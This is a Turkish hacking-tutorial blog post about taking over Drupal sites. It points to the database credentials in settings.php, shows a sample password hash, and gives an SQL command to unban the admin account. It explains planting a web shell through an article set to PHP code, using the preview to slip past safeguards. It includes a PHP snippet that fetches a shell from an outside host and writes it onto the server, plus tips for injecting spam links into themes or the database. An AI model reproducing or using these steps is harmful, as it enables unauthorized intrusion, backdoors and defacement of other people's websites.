Ana Sayfa / Eğitim / Drupal Detayları

Drupal Detayları

Drupal siteler önceden güvenilir bir cms olarak ön planda idi ancak son senelerde birçok açığı tespit edildi , otomatik şifre resetleyiciye kadar (eski token açığı gibi)..

Drupal sitelerin config dosyaları biraz şaşırtıcıdır , db adı şifre gibi bilgileri array içinde yer alır , config dosyasının bulunduğu konum ise şöyledir /sites/default/settings.php

örnek config kısmı

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'amis2min_amisdb',
      'username' => 'amis2min_amisdb',
      'password' => 'amisdb',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

örnek drupalşifre hash : $S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu = admin

mysql execute ile adminin üyeliğinin yasağını kaldırmak.

UPDATE users SET status = 1 WHERE uid=1;

Drupal sitelerin admin paneline girdikten sonra shell yüklemek içni herhangi bir upload alanı yoktur bu yüzden content kısmından yani makale eklenen kısımdan makale yerine shell kodlarınızı yapıştırmanız gerekir ve ayrıca text format kısmını PHP code olarak değiştirmeniz gerekir böylece shell kodlarınızı yolladığınız makale sayfasında çalıştırabilesiniz. Bazı drupal sitelerde shell kodlarını girdikten sonra sayfayı yolla demenize rağmen hata verebilir ve bir güvenlik önlemi alınmış olup makaleyi yollamanıza izin vermeyebilir , böyle durumlarda Preview (önizleme) özelliğini kullanmalısınız. Ön izleme sayesinde makaleyi yollamadan php kodunu test sayfasında çalıştırabilirsiniz , ancak bu test sayfasında shell çalıştırmanız sizin bir işinize yaramaz çünki herhangi bir butona tıkladığınız anda shell geçersiz konuma düşecektir ! bu sebepten tek çalıştırmalık bir kod hazırlamanız gerekmekte , yani preview dediğiniz anda siteye dışardan shelli çekip yüklemiş olsun , aşağıdaki örnek koda bakabilirsiniz.

$file = file_get_contents('http://w0rms.com/shell/angel.txt');
$b = fopen('angel.php', 'w');
fwrite($b,$file);
fclose($b);
print 'Başarılı ! <a href=angel.php></a>';

Drupal sitelere linkini eklemek istiyorsanız tema dosyası içinden html.tpl.php dosyasına eklemeniz yeterli olacaktır. eğer mysqldan eklemek istiyorsanız block_custom tablosu işinizi görecektir.

About Editör Reis

Ayrıca bakınız

BGA Eğitim Seti (Ücretsiz)

Sizlere BGA Security’nin paylaşmış olduğu Beyaz Şapkalı Eğitim Setini paylaşıyorum.​ Eğitim içeriği A’dan Z’ye Nasıl Hacker Olurum? sorusunu …

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir